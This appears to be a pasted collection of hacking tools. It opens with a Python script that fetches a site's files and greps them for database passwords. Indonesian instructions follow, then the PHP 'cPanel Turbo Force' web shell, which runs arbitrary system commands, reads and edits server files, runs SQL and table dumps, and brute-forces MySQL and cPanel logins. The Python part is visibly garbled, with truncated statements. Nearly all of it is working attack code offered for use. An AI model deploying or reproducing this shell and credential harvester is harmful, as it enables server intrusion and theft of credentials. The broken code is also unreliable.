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Dec 25th, 2013
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  1. #!/usr/bin/env python
  2. ”’
  3. By: Ahmed Shawky aka lnxg33k
  4. thx: Obzy, Relik, mohab and #arabpwn
  5. ”’
  6. import sys
  7. import os
  8. import re
  9. import subprocess
  10. import urllib
  11. import glob
  12. from platform import system
  13. if len(sys.argv) != 3:
  14. print”’
  15. Usage: %s [URL...] [directory...]
  16. Ex) %s [dir ...]”’ % (sys.argv[0], sys.argv[0])
  17. sys.exit(1)
  18. site = sys.argv[1]
  19. fout = sys.argv[2]
  20. try:
  21. req = urllib.urlopen(site)
  22. read =
  23. if system() == ‘Linux’:
  24. f = open(‘/tmp/data.txt’, ‘w’)
  25. f.write(read)
  26. f.close()
  27. if system() == ‘Windows’:
  28. f = open(‘data.txt’, ‘w’)
  29. f.write(read)
  30. f.close()
  31. i = 0
  32. if system() == ‘Linux’:
  33. f = open(‘/tmp/data.txt’, ‘rU’)
  34. for line in f:
  35. if line.startswith(‘<li><a’) == True :
  36. m =’(<a href=”)(.+[^>])(“>)’, line)
  37. i += 1
  38. local_name = ‘%s/file%d.txt’ % (fout, i)
  39. print ‘Retrieving…\t\t’, site +
  40. try: urllib.urlretrieve(site +, local_name)
  41. except IOError:
  42. print ‘\n[%s] doesn\’t exist, create it first’ % fout
  43. sys.exit()
  44. if line.startswith(‘<img’) == True:
  45. m1 =’(<a href=”)(.+[^>])(“>)’, line)
  46. i += 1
  47. local_name = ‘%s/file%d.txt’ % (fout, i)
  48. print ‘Retrieving…\t\t’, site +
  49. try: urllib.urlretrieve(site +, local_name)
  50. except IOError:
  51. print ‘\n[%s] doesn\’t exist, create it first’ % fout
  52. sys.exit()
  53. if line.startswith(‘<IMG’) == True:
  54. m2 =’(<A HREF=”)(.+[^>])(“>)’, line)
  55. i += 1
  56. local_name = ‘%s/file%d.txt’ % (fout, i)
  57. print ‘Retrieving…\t\t’, site +
  58. try: urllib.urlretrieve(site +, local_name)
  59. except IOError:
  60. print ‘\n[%s] doesn\’t exist, create it first’ % fout
  61. sys.exit()
  62. f.close()
  63. if system() == ‘Windows’:
  64. f = open(‘data.txt’, ‘rU’)
  65. for line in f:
  66. if line.startswith(‘<li><a’) == True :
  67. m =’(<a href=”)(.+[^>])(“>)’, line)
  68. i += 1
  69. local_name = ‘%s/file%d.txt’ % (fout, i)
  70. print ‘Retrieving…\t\t’, site +
  71. try: urllib.urlretrieve(site +, local_name)
  72. except IOError:
  73. print ‘\n[%s] doesn\’t exist, create it first’ % fout
  74. sys.exit()
  75. if line.startswith(‘<img’) == True:
  76. m1 =’(<a href=”)(.+[^>])(“>)’, line)
  77. i += 1
  78. local_name = ‘%s/file%d.txt’ % (fout, i)
  79. print ‘Retrieving…\t\t’, site +
  80. try: urllib.urlretrieve(site +, local_name)
  81. except IOError:
  82. print ‘\n[%s] doesn\’t exist, create it first’ % fout
  83. sys.exit()
  84. if line.startswith(‘<IMG’) == True:
  85. m2 =’(<A HREF=”)(.+[^>])(“>)’, line)
  86. i += 1
  87. local_name = ‘%s/file%d.txt’ % (fout, i)
  88. print ‘Retrieving…\t\t’, site +
  89. try: urllib.urlretrieve(site +, local_name)
  90. except IOError:
  91. print ‘\n[%s] doesn\’t exist, create it first’ % fout
  92. sys.exit()
  93. f.close()
  94. if system() == ‘Linux’:
  95. cleanup = subprocess.Popen(‘rm -rf /tmp/data.txt > /dev/null’, shell=True).wait()
  96. if system() == ‘Windows’:
  97. cleanup = subprocess.Popen(‘del C:\data.txt’, shell=True).wait()
  98. print ‘\n’, ‘-’ * 100, ‘\n’
  99. if system() == ‘Linux’:
  100. for root, dirs, files in os.walk(fout):
  101. for fname in files:
  102. fullpath = os.path.join(root, fname)
  103. f = open(fullpath, ‘r’)
  104. for line in f:
  105. secr = (r”(db_password’] = ‘)(.+[^>])(‘;)”, line)
  106. if secr is not None: print (
  107. secr1 =”(password = ‘)(.+[^>])(‘;)”, line)
  108. if secr1 is not None: print (
  109. secr2 =”(DB_PASSWORD’)(…)(.+[^>])(‘)”, line)
  110. if secr2 is not None: print (
  111. secr3 = (r”(dbpass =..)(.+[^>])(.;)”, line)
  112. if secr3 is not None: print (
  113. secr4 = (r”(DBPASSWORD = ‘)(.+[^>])(.;)”, line)
  114. if secr4 is not None: print (
  115. secr5 = (r”(DBpass = ‘)(.+[^>])(‘;)”, line)
  116. if secr5 is not None: print (
  117. secr6 = (r”(dbpasswd = ‘)(.+[^>])(‘;)”, line)
  118. if secr6 is not None: print (
  119. secr7 = (r”(mosConfig_password = ‘)(.+[^>])(‘;)”, line)
  120. if secr7 is not None: print (
  121. f.close()
  122. if system() == ‘Windows’:
  123. for infile in glob.glob( os.path.join(fout, ‘*.txt’) ):
  124. f = open(infile, ‘r’)
  125. for line in f:
  126. secr = (r”(db_password’] = ‘)(.+[^>])(‘;)”, line)
  127. if secr is not None: print (
  128. secr1 =”(password = ‘)(.+[^>])(‘;)”, line)
  129. if secr1 is not None: print (
  130. secr2 =”(DB_PASSWORD’)(…)(.+[^>])(‘)”, line)
  131. if secr2 is not None: print (
  132. secr3 = (r”(dbpass =..)(.+[^>])(.;)”, line)
  133. if secr3 is not None: print (
  134. secr4 = (r”(DBPASSWORD = ‘)(.+[^>])(.;)”, line)
  135. if secr4 is not None: print (
  136. secr5 = (r”(DBpass = ‘)(.+[^>])(‘;)”, line)
  137. if secr5 is not None: print (
  138. secr6 = (r”(dbpasswd = ‘)(.+[^>])(‘;)”, line)
  139. if secr6 is not None: print (
  140. secr7 = (r”(mosConfig_password = ‘)(.+[^>])(‘;)”, line)
  141. if secr7 is not None: print (
  142. f.close()
  143. except (KeyboardInterrupt):
  144. print ‘\nThanks for using it ._^’
  145. 4. untuk windows download python di kalau untuk pengguna backtrack , lanjut ajah ! viva backtrackers :*
  146. 5. shell cpanel bruteforce save dengan cpanel.php yang penting berekstensi php
  147. <html>
  148. <title>cPanel Turbo Force v2</title>
  149. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  150. <?php
  151. /*
  152. Turbo Force By Tryag.Cc
  153. */
  154. @set_time_limit(0);
  155. @error_reporting(0);echo '<head>
  156. <style type="text/css">
  157. <!--
  158. body {
  159. background-color: #000000;
  160. font-size: 18px;
  161. color: #cccccc;
  162. }
  163. input,textarea,select{
  164. font-weight: bold;
  165. color: #cccccc;
  166. dashed #ffffff;
  167. border: 1px
  168. solid #2C2C2C;
  169. background-color: #080808
  170. }
  171. a {
  172. background-color: #151515;
  173. vertical-align: bottom;
  174. color: #000;
  175. text-decoration: none;
  176. font-size: 20px;
  177. margin: 8px;
  178. padding: 6px;
  179. border: thin solid #000;
  180. }
  181. a:hover {
  182. background-color: #080808;
  183. vertical-align: bottom;
  184. color: #333;
  185. text-decoration: none;
  186. font-size: 20px;
  187. margin: 8px;
  188. padding: 6px;
  189. border: thin solid #000;
  190. }
  191. .style1 {
  192. text-align: center;
  193. }
  194. .style2 {
  195. color: #FFFFFF;
  196. font-weight: bold;
  197. }
  198. .style3 {
  199. color: #FFFFFF;
  200. }
  201. -->
  202. </style>
  203. </head>
  204. ';
  205. function in($type,$name,$size,$value,$checked=0)
  206. {
  207. $ret = "<input type=".$type." name=".$name." "; if($size != 0)
  208. {
  209. $ret .= "size=".$size." "; }
  210. $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
  211. class my_sql
  212. {
  213. var $host = 'localhost'; var $port = '; var $user = '; var $pass = '; var $base = '; var $db = '; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()
  214. {
  215. switch($this->db)
  216. {
  217. case 'MySQL': if(empty($this->port))
  218. {
  219. $this->port = '3306'; }
  220. if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port))
  221. {
  222. $this->port = '1433'; }
  223. if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port))
  224. {
  225. $this->port = '5432'; }
  226. $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
  227. return 0; }
  228. function select_db()
  229. {
  230. switch($this->db)
  231. {
  232. case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
  233. return 0; }
  234. function query($query)
  235. {
  236. $this->res=$this->error='; switch($this->db)
  237. {
  238. case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  239. {
  240. $this->error = @mysql_error($this->connection); return 0; }
  241. else if(is_resource($this->res))
  242. {
  243. return 1; }
  244. return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection)))
  245. {
  246. $this->error = 'Query error'; return 0; }
  247. else if(@mssql_num_rows($this->res) > 0)
  248. {
  249. return 1; }
  250. return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query)))
  251. {
  252. $this->error = @pg_last_error($this->connection); return 0; }
  253. else if(@pg_num_rows($this->res) > 0)
  254. {
  255. return 1; }
  256. return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query)))
  257. {
  258. $this->error = 'Query parse error'; }
  259. else
  260. {
  261. if(@ociexecute($this->res))
  262. {
  263. if(@ocirowcount($this->res) != 0) return 2; return 1; }
  264. $error = @ocierror(); $this->error=$error['message']; }
  265. break; }
  266. return 0; }
  267. function get_result()
  268. {
  269. $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db)
  270. {
  271. case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
  272. {
  273. $this->columns = @array_keys($this->rows[0]); return 1;}
  274. break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
  275. {
  276. $this->columns = @array_keys($this->rows[0]); return 1;}
  277. ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
  278. {
  279. $this->columns = @array_keys($this->rows[0]); return 1;}
  280. break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
  281. {
  282. $this->columns = @array_keys($this->rows[0]); return 1;}
  283. break; }
  284. return 0; }
  285. function dump($table)
  286. {
  287. if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db)
  288. {
  289. case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  290. {
  291. foreach($this->rows[$i] as $k=>$v)
  292. {
  293. $this->rows[$i][$k] = @mysql_real_escape_string($v);}
  294. $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\'.@implode("', '", $this->rows[$i]).'\');'; }
  295. break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  296. {
  297. foreach($this->rows[$i] as $k=>$v)
  298. {
  299. $this->rows[$i][$k] = @addslashes($v);}
  300. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\'.@implode("', '", $this->rows[$i]).'\');'; }
  301. break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  302. {
  303. foreach($this->rows[$i] as $k=>$v)
  304. {
  305. $this->rows[$i][$k] = @addslashes($v);}
  306. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\'.@implode("', '", $this->rows[$i]).'\');'; }
  307. break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
  308. return 1; }
  309. function close()
  310. {
  311. switch($this->db)
  312. {
  313. case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
  314. }
  315. function affected_rows()
  316. {
  317. switch($this->db)
  318. {
  319. case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
  320. }
  321. }
  322. if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name']))
  323. {
  324. if(!$file=@fopen($_POST['d_name'],"r"))
  325. {
  326. err(1,$_POST['d_name']); $_POST['cccc']=""; }
  327. else
  328. {
  329. @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type='; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
  330. {
  331. header('Content-Encoding: ' . $content_encoding); }
  332. header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
  333. }
  334. if(isset($_GET['phpinfo']))
  335. {
  336. echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  337. if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
  338. {
  339. echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  340. {
  341. if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  342. {
  343. foreach($querys as $num=>$query)
  344. {
  345. if(strlen($query)>5)
  346. {
  347. echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
  348. {
  349. case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result())
  350. {
  351. echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
  352. {
  353. foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
  354. echo "</table>"; }
  355. break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
  356. }
  357. }
  358. }
  359. }
  360. echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>";
  361. echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query');
  362. echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  363. function ccmmdd($ccmmdd2,$att)
  364. {
  365. global $ccmmdd2,$att;
  366. echo '
  367. <table style="width: 100%" dir="rtl">
  368. <tr>
  369. <td><strong>ãæÌÉ ÇáÃæãÑ</strong></td>
  370. </tr>
  371. <tr>
  372. <td>
  373. <form method="post">
  374. <select name="att" dir="rtl" style="height: 109px" size="6">
  375. ';
  376. if($_POST['att']==null)
  377. {
  378. echo ' <option value="system" selected="">system</option>';
  379. }else{
  380. echo " <option value='$_POST[att]' selected='>$_POST[att]</option>
  381. <option value=system>system</option>
  382. ";
  383. }
  384. echo '
  385. <option value="passthru">passthru</option>
  386. <option value="exec">exec</option>
  387. <option value="shell_exec">shell_exec</option>
  388. </select>
  389. <input name="page" value="ccmmdd" type="hidden"><br>
  390. <input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
  391. <input type="submit" value="ÊäÝíÐ">
  392. </form>
  393. </td>
  394. </tr>
  395. <tr>
  396. <td>
  397. ';
  398. if($_POST[att]=='system')
  399. {
  400. echo '
  401. <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  402. system($_POST['ccmmdd2']);
  403. echo ' </textarea>';
  404. }
  405. if($_POST[att]=='passthru')
  406. {
  407. echo '
  408. <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  409. passthru($_POST['ccmmdd2']);
  410. echo ' </textarea>';
  411. }
  412. if($_POST[att]=='exec')
  413. {
  414. echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  415. exec($_POST['ccmmdd2'],$res);
  416. echo $res = join("\n",$res);
  417. echo ' </textarea>';
  418. }
  419. if($_POST[att]=='shell_exec')
  420. {
  421. echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  422. echo shell_exec($_POST['ccmmdd2']);
  423. echo ' </textarea>';
  424. }
  425. echo '
  426. </td>
  427. </tr>
  428. </table>
  429. ';
  430. exit;
  431. }
  432. if($_POST['page']=='edit')
  433. {
  434. $code=@str_replace("\r\n","\n",$_POST['code']);
  435. $code=@str_replace('\\',',$code);
  436. $fp = fopen($pathclass, 'w');
  437. fwrite($fp,"$code");
  438. fclose($fp);
  439. echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  440. exit;
  441. }
  442. if($_POST['page']=='show')
  443. {
  444. $pathclass =$_POST['pathclass'];
  445. echo '
  446. <form method="POST">
  447. <input type="hidden" name="page" value="edit">
  448. ';
  449. $sahacker = fopen($pathclass, "rb");
  450. echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';
  451. $code = fread($sahacker, filesize($pathclass));
  452. echo $code =htmlspecialchars($code);
  453. echo '</textarea>';
  454. fclose($sahacker);
  455. echo '
  456. <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
  457. <br><strong><input type="submit" value="edit file">
  458. </form>
  459. ';
  460. exit;
  461. }
  462. if($_POST['page']=='ccmmdd')
  463. {
  464. echo ccmmdd($ccmmdd2,$att);
  465. exit;
  466. }
  467. if($_POST['page']=='find')
  468. {
  469. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  470. {
  471. if($_POST['type'] == 'passwd'){
  472. $e = explode("\n",$_POST['usernames']);
  473. foreach($e as $value){
  474. $k = explode(":",$value);
  475. $username .= $k['0']." ";
  476. }
  477. }elseif($_POST['type'] == 'simple'){
  478. $username = str_replace("\n",' ',$_POST['usernames']);
  479. }
  480. $a1 = explode(" ",$username);
  481. $a2 = explode("\n",$_POST['passwords']);
  482. $id2 = count($a2);
  483. $ok = 0;
  484. foreach($a1 as $user )
  485. {
  486. if($user !== ')
  487. {
  488. $user=trim($user);
  489. for($i=0;$i<=$id2;$i++)
  490. {
  491. $pass = trim($a2[$i]);
  492. if(@mysql_connect('localhost',$user,$pass))
  493. {
  494. echo "TrYag~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
  495. $ok++;
  496. }
  497. }
  498. }
  499. }
  500. echo "<hr><b>You Found <font color=green>$ok</font> Cpanel By Tryag Script Name</b>";
  501. echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  502. exit;
  503. }
  504. }
  505. ?>
  506. <form method="POST" target="_blank">
  507. <strong>
  508. <input name="page" type="hidden" value="find">
  509. </strong>
  510. <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
  511. <tr>
  512. <td valign="top" bgcolor="#151515"><center><strong><img src="" /><br>
  513. </strong>
  514. <a href=""><strong>Turbo Force By Tryag</strong></a></center></td>
  515. </tr>
  516. <tr>
  517. <td>
  518. <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  519. <td valign="top" bgcolor="#151515" style="width: 139px">
  520. <strong>User :</strong></td>
  521. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
  522. </tr>
  523. <tr>
  524. <td valign="top" bgcolor="#151515" style="width: 139px">
  525. <strong>Pass :</strong></td>
  526. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
  527. </tr>
  528. <tr>
  529. <td valign="top" bgcolor="#151515" style="width: 139px">
  530. <strong>Type :</strong></td>
  531. <td valign="top" bgcolor="#151515" colspan="5">
  532. <span><strong>Simple : </strong> </span>
  533. <strong>
  534. <input type="radio" name="type" value="simple" checked="checked"></strong>
  535. <font><strong>/etc/passwd : </strong> </font>
  536. <strong>
  537. <input type="radio" name="type" value="passwd"></strong><span><strong>
  538. </strong>
  539. </span>
  540. </td>
  541. </tr>
  542. <tr>
  543. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  544. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">
  545. </strong>
  546. </td>
  547. <tr>
  548. </form>
  549. <td valign="top" colspan="6"><strong></strong></td>
  550. <form method="POST" target="_blank">
  551. <strong>
  552. <input type="hidden" name="go" value="cmd_mysql">
  553. </strong>
  554. <tr>
  555. <td valign="top" bgcolor="#151515" colspan="6"><strong>CMD MYSQL</strong></td>
  556. </tr>
  557. <tr>
  558. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
  559. <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
  560. <td valign="top" bgcolor="#151515"><strong>pass</strong></td>
  561. <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
  562. <td valign="top" bgcolor="#151515"><strong>database</strong></td>
  563. <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
  564. </tr>
  565. <tr>
  566. <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
  567. <strong>cmd ~</strong></td>
  568. <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
  569. <strong>
  570. <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
  571. SHOW TABLES user_vb ;
  572. SELECT * FROM user;
  573. SELECT version();
  574. SELECT user();</textarea></strong></td>
  575. </tr>
  576. <tr>
  577. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  578. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
  579. </tr>
  580. <input name="db" value="MySQL" type="hidden">
  581. <input name="db_server" type="hidden" value="localhost">
  582. <input name="db_port" type="hidden" value="3306">
  583. <input name="cccc" type="hidden" value="db_query">
  584. </form>
  585. <tr>
  586. <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>
  587. </tr>
  588. <form method="POST" target="_blank">
  589. <tr>
  590. <td valign="top" bgcolor="#151515" colspan="6"><strong>CMD
  591. system - passthru - exec - shell_exec</strong></td>
  592. </tr>
  593. <tr>
  594. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td>
  595. <td valign="top" bgcolor="#151515" colspan="5">
  596. <select name="att" dir="rtl" size="1">
  597. <?php
  598. if($_POST['att']==null)
  599. {
  600. echo ' <option value="system" selected="">system</option>';
  601. }else{
  602. echo " <option value='$_POST[att]' selected='>$_POST[att]</option>
  603. <option value=system>system</option>
  604. ";
  605. }
  606. ?>
  607. <option value="passthru">passthru</option>
  608. <option value="exec">exec</option>
  609. <option value="shell_exec">shell_exec</option>
  610. </select>
  611. <strong>
  612. <input name="page" type="hidden" value="ccmmdd">
  613. <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
  614. </tr>
  615. <tr>
  616. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  617. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td>
  618. </tr>
  619. </form>
  620. <form method="POST" target="_blank">
  621. <tr>
  622. <td valign="top" bgcolor="#151515" colspan="6"><strong>Show
  623. File And Edit</strong></td>
  624. </tr>
  625. <tr>
  626. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
  627. <td valign="top" bgcolor="#151515" colspan="5">
  628. <strong>
  629. <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath(')?>"></strong></td>
  630. </tr>
  631. <tr>
  632. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  633. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
  634. </tr>
  635. <input name="page" type="hidden" value="show">
  636. </form>
  637. <tr>
  638. <td valign="top" bgcolor="#151515" colspan="6"><strong>Info
  639. Security</strong></td>
  640. </tr>
  641. <tr>
  642. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
  643. <td valign="top" bgcolor="#151515" colspan="5">
  644. <strong>
  645. <?php
  646. $safe_mode = ini_get('safe_mode');
  647. if($safe_mode=='1')
  648. {
  649. echo 'ON';
  650. }else{
  651. echo 'OFF';
  652. }
  653. ?>
  654. </strong>
  655. </td>
  656. </tr>
  657. <tr>
  658. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Function</strong></td>
  659. <td valign="top" bgcolor="#151515" colspan="5">
  660. <strong>
  661. <?php
  662. if('==($func=@ini_get('disable_functions')))
  663. {
  664. echo "<font color=#00800F>No Security for Function</font></b>";
  665. }else{
  666. echo "<font color=red>$func</font></b>";
  667. }
  668. ?></strong></td>
  669. <tr>
  670. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  671. <td valign="top" bgcolor="#151515" colspan="5"><strong></strong></td>
  672. </table>
  673. </td>
  674. </tr>
  675. </table>
  676. <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>
  677. <form style="border: 0px ridge #FFFFFF">
  678. <p align="center"></td>
  679. </tr><div align="center">
  680. <tr>
  681. <input type="submit" name="user" value="user"><option value="name"></select>
  682. </form>
  683. <div align="center">
  684. <table border="5" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="5">
  685. <tr>
  686. <td bordercolorlight="#008000" bordercolordark="#006A00">
  687. <p align="left">
  688. <textarea method='POST' rows="25" name="S1" cols="16">
  689. <?php
  690. if ($_GET['user'] )
  691. system('ls /var/mail');
  692. for($uid=0;$uid<90000;$uid++){
  693. }
  694. ?></textarea>
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